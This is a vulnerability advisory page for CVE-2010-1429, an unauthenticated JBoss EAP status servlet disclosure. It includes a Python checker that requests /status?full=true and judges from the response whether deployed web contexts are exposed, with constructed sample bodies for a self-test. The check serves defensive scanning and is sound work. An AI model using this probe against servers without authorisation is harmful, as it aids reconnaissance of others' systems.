CVE-2010-1429

high

Description

Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression: the earlier fix that restricted the status servlet was lost, so the same unauthenticated context listing reappeared in these releases.
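A practitioner checking for this issue wants to send the request shape named in the description (a GET to the status servlet with full=true) and decide from the response whether deployed web contexts are being disclosed without authentication. The script below is an added example written for this page, not code from Red Hat, JBoss or any of the referenced advisories. It assumes the status servlet lives at /status under the server root, that the page (which is Tomcat-derived) carries an "Application list" heading and lists each context path inside h1/h2 tags, and that a patched server (4.2.0.CP09 / 4.3.0.CP08 or later) answers with 401/403 instead of the listing; all three are assumptions, and the sample response bodies are constructed for the offline self-test.

```python
import re
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass, field

STATUS_PATH = "/status"    # assumed location of the JBoss/Tomcat status servlet
FULL_QUERY = "full=true"   # query string named in the CVE description

# Assumed markers of the Tomcat-derived status page (not taken from the advisory):
# a heading introducing the application list, and one heading per context path.
APP_LIST_MARKER = "Application list"
CONTEXT_RE = re.compile(r"<h[12]>\s*(/[^<\s]*)\s*</h[12]>", re.IGNORECASE)


@dataclass
class StatusCheck:
    exposed: bool
    reason: str
    contexts: list = field(default_factory=list)


def classify_status_response(status_code, body):
    """Decide from an HTTP status and body whether the status servlet leaks contexts."""
    if status_code in (401, 403):
        return StatusCheck(False, "status servlet requires authentication (expected on a patched CP level)")
    if status_code == 404:
        return StatusCheck(False, "status servlet not deployed")
    if status_code != 200:
        return StatusCheck(False, "unexpected HTTP %d" % status_code)
    # Deduplicate and sort so the result is stable regardless of page layout.
    contexts = sorted(set(CONTEXT_RE.findall(body)))
    if APP_LIST_MARKER in body or contexts:
        return StatusCheck(True, "unauthenticated status page lists deployed web contexts", contexts)
    return StatusCheck(False, "HTTP 200 but no context listing found")


def fetch_status(base_url, timeout=10):
    """GET <base_url>/status?full=true and return (status_code, body); network only when called."""
    url = base_url.rstrip("/") + STATUS_PATH + "?" + FULL_QUERY
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2010-1429-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # 401/403/404 arrive as exceptions; keep the code so the classifier can use it.
        return err.code, err.read().decode("utf-8", "replace")


def check_host(base_url):
    """Convenience wrapper: fetch and classify in one call."""
    code, body = fetch_status(base_url)
    return classify_status_response(code, body)


# Constructed sample bodies (not captured from a real server) for an offline self-test.
SAMPLE_EXPOSED = """<html><body>
<h1>JVM</h1><p>Free memory: 12 MB</p>
<h1>Application list</h1>
<h1>/jmx-console</h1><p>Startup time: 0 ms</p>
<h1>/web-console</h1><p>Startup time: 0 ms</p>
</body></html>"""

SAMPLE_NO_CONTEXTS = "<html><body><h1>JVM</h1><p>Free memory: 12 MB</p></body></html>"


def main(argv):
    if len(argv) > 1:
        result = check_host(argv[1])
    else:
        # No target given: run the classifier against the constructed sample instead.
        result = classify_status_response(200, SAMPLE_EXPOSED)
    print("exposed=%s reason=%s contexts=%s" % (result.exposed, result.reason, result.contexts))
    return 0 if not result.exposed else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python check_status.py http://host:8080/` against a test instance; with no argument it classifies the constructed sample. The classifier is kept separate from the fetch so that a captured response from a proxy log can be fed in directly, and so that the exit code (1 when exposed) can drive a CI or inventory job.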

References

https://www.exploit-db.com/exploits/44009/

https://rhn.redhat.com/errata/RHSA-2010-0379.html

https://rhn.redhat.com/errata/RHSA-2010-0378.html

https://rhn.redhat.com/errata/RHSA-2010-0377.html

https://rhn.redhat.com/errata/RHSA-2010-0376.html

https://exchange.xforce.ibmcloud.com/vulnerabilities/58149

https://bugzilla.redhat.com/show_bug.cgi?id=585900

http://www.vupen.com/english/advisories/2010/0992

http://www.securityfocus.com/bid/39710

http://securitytracker.com/id?1023918

http://secunia.com/advisories/39563

http://marc.info/?l=bugtraq&m=132698550418872&w=2

Details

Source: Mitre, NVD

Published: 2010-04-28

Risk Information

CVSS v2

Base Score: 5.0

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

Severity: Medium

CVSS v3

Base Score: 7.5

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Severity: High